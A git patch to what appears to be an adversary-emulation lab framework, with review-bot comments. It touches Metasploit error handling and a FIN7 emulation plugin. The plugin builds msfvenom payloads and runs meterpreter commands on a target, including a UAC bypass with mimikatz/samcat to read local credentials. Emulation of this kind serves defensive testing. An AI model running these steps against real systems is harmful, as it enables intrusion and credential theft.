From 9a25537e99bdb19a76ab564867cd88644fe0433b Mon Sep 17 00:00:00 2001
From: Thorsten Sick
Date: Mon, 21 Jun 2021 07:54:31 +0200
Subject: [PATCH] Added Metasploit exception.
---
 app/config.py | 8 ++++++++
 app/exceptions.py | 4 ++++
 app/metasploit.py | 12 ++++++++++--
 .../adversary_emulations/FIN7/fin7_section1.py | 17 +++++++++--------
 .../FIN7/local_experiment_config.yaml | 2 ++
 5 files changed, 33 insertions(+), 10 deletions(-)
diff --git a/app/config.py b/app/config.py
index b8bbb53..27d978d 100644
--- a/app/config.py
+++ b/app/config.py
@@ -50,6 +50,14 @@ class MachineConfig():
         return self.raw_config["vm_name"]
+    def get_nicknames(self):
+        """ Gets the nicknames """
+
+        if "nicknames" in self.raw_config:
+            return self.raw_config["nicknames"] or []
+
+        return []
+
     def vmcontroller(self):
         """ Returns the vm controller. lowercase """
diff --git a/app/exceptions.py b/app/exceptions.py
index 12f02fc..e8c764f 100644
--- a/app/exceptions.py
+++ b/app/exceptions.py
@@ -20,3 +20,7 @@ class CalderaError(Exception):
 class NetworkError(Exception):
     """ Network connection (like ssh) can not be established """
+
+
+class MetasploitError(Exception):
+    """ Metasploit had an error """
diff --git a/app/metasploit.py b/app/metasploit.py
index cdaafff..5e5eab2 100644
--- a/app/metasploit.py
+++ b/app/metasploit.py
@@ -6,6 +6,7 @@ from app.attack_log import AttackLog
 from app.interface_sfx import CommandlineColors
 import time
 import socket
+from app.exceptions import MetasploitError
 import os
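Review bot: `get_nicknames` does a membership test and then a second lookup on `raw_config` where a single `dict.get` says the same thing; `return self.raw_config.get("nicknames") or []` keeps the None-to-empty-list normalisation (a `nicknames:` key left empty in YAML loads as None) in one line, assuming `raw_config` is a plain dict, which the hunk does not show. The docstring only repeats the method name; it should state the contract, e.g. `""" Returns the list of nicknames configured for this machine, or an empty list if none are set """`. Note also that in the non-empty case the method hands back the config's own list object, so a caller that mutates it mutates the loaded config — worth a sentence in the docstring if that is acceptable.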
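Review bot: The new `from app.exceptions import MetasploitError` lands between `import socket` and `import os`, splitting the standard-library imports with a project import; the file already groups its project imports (`app.attack_log`, `app.interface_sfx`) above the stdlib ones in the context shown. Move the line up next to `from app.interface_sfx import CommandlineColors` so the two groups stay separate. This is a point of layout only; the name is used correctly in the later hunk of this file.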
@@ -79,7 +80,14 @@ class Metasploit():
         """
         # Get_ip can also return a network name. Matching a session needs a real ip
-        ip = socket.gethostbyname(target.get_ip())
+        name_resolution_worked = True
+        try:
+            ip = socket.gethostbyname(target.get_ip())
+        except socket.gaierror:
+            ip = target.get_ip() # Limp on feature if we can not get a name resolution
+            name_resolution_worked = False
+            print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}")
+            # TODO: Try to get the ip address from kali system
         retries = 100
         while retries > 0:
@@ -90,7 +98,7 @@ class Metasploit():
             time.sleep(1)
             retries -= 1
-        return None # TODO: Better error handlign as soon as we know where we use it
+        raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}")
     def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str:
         """ Executes commands on the meterpreter, returns results read from shell
diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
index 59ebd38..a9dae9e 100644
--- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py
+++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
@@ -128,6 +128,9 @@ class FIN7Plugin(AttackPlugin):
         # -f C : output is c code
         # --encrypt xor : xor encrypt the results
         # --encrypt-key m : the encryption key
+
+        self.attacker_machine_plugin.remote_run("sudo apt install msfpc") # MSFVenom needs to be installed
+
         venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
         venom.generate_and_deploy(payload=self.payload_type_1, architecture="x64",
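Review bot: When `socket.gethostbyname` raises `gaierror`, `ip` is left holding the unresolved name from `target.get_ip()`, although the comment right above says session matching needs a real ip; the retry loop that follows (its body lies outside this hunk) will then, as far as I can tell, compare that name against session addresses, never match, and only after 100 one-second retries raise. Unless the TODO's Kali-side resolution is added, failing fast from the except branch is more honest than limping on for 100 s — or at least change the comment to say the fallback only defers the failure. The diagnostic `print(...)` dumps `self.get_client().sessions.list` to stdout instead of going through the attack logger the rest of the codebase uses, and `target.get_ip()` is called three times in the branch; bind it once, `target_ip = target.get_ip()`, before the `try`. The enclosing method starts before this hunk.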
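Review bot: Replacing `return None` with `raise MetasploitError` changes this method's contract for every caller that tested the result for None; the `meterpreter_execute_on` call sites in fin7_section1.py within this same patch do not catch it, so a missing session now aborts the whole emulation run, which may be intended but is not stated anywhere. The method's docstring (it begins before this hunk) should gain a raises entry in the file's docstring style, e.g. `Raises MetasploitError if no session for the target appears within the retry window`. The message also runs its two clauses together; `f"Could not find session for {target.get_ip()} (name resolution worked: {name_resolution_worked})"` reads better.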
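Review bot: `sudo apt install msfpc` carries no `-y`, so when `remote_run` executes it without a tty apt will either abort at the confirmation prompt or block waiting for input, depending on how the remote shell is set up; `self.attacker_machine_plugin.remote_run("sudo apt-get install -y msfpc")` is the non-interactive form (apt itself warns that its command line is not stable for scripts). The return value of `remote_run` is also discarded, so a failed install is only noticed when `MSFVenom` fails further down, and the install is repeated on every run of this step; consider logging the result through `self.attack_logger` and moving the package install into machine provisioning. The enclosing method starts and ends outside this hunk.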
@@ -179,11 +182,10 @@ class FIN7Plugin(AttackPlugin):
             f"{CommandlineColors.OKCYAN}Execute arp through meterpreter{CommandlineColors.ENDC}", 1)
         print(metasploit.meterpreter_execute_on(["arp"], hotelmanager))
         # powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
-        # TODO: Add real ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
-        # itadmin = "127.0.0.1"
-        # self.attack_logger.vprint(
-        # f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1)
-        # print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
+        # TODO: Add a new machine in config as ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
+        itadmin = self.get_target_by_name("itadmin")
+        self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1)
+        print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
         # Copy step 5 attack tools to attacker
@@ -215,7 +217,6 @@ class FIN7Plugin(AttackPlugin):
         self.attack_logger.vprint(
             f"{CommandlineColors.OKCYAN}Execute UAC bypass (and mimikatz) through meterpreter{CommandlineColors.ENDC}", 1)
         print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20))
-        # TODO: Make it more reliable. Also test which OS versions are working properly. It worked at least once
         # samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
@@ -313,8 +314,8 @@ class FIN7Plugin(AttackPlugin):
         self.step1()
         self.step2()
         self.step3() # Done and works
-        self.step4()
-        self.step5()
+        self.step4() # Partial - with a hack
+        self.step5() # Done and quite ok
         self.step6()
         self.step7()
         self.step8()
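Review bot: `itadmin` is now whatever `self.get_target_by_name("itadmin")` returns and is interpolated straight into the nslookup command, whereas the commented-out version it replaces substituted an IP string; if that helper returns a machine object — the `target.get_ip()` usage in app/metasploit.py suggests targets are objects — the command will carry the object's repr instead of an address, and if the nickname is unknown it will carry `None`. Resolve the address explicitly and guard the lookup, e.g. `itadmin = self.get_target_by_name("itadmin")` / `if itadmin is None: raise ValueError("no target named itadmin")` / `... -a '{itadmin.get_ip()}'`, adjusting to what the helper actually returns. The config change in this patch makes `itadmin` a nickname of the same VM as `hotelmanager`, so until that TODO is resolved the lookup targets the host it runs on; saying so in the TODO would spare the next reader a surprise. The enclosing method starts and ends outside this hunk.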
diff --git a/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml b/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml
index 34a449a..d1eace7 100644
--- a/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml
+++ b/plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml
@@ -57,8 +57,10 @@ targets:
     vm_name: target2
+    # TODO: itadmin must be moved to another target
     nicknames:
       - hotelmanager
+      - itadmin
     os: windows
     paw: target2w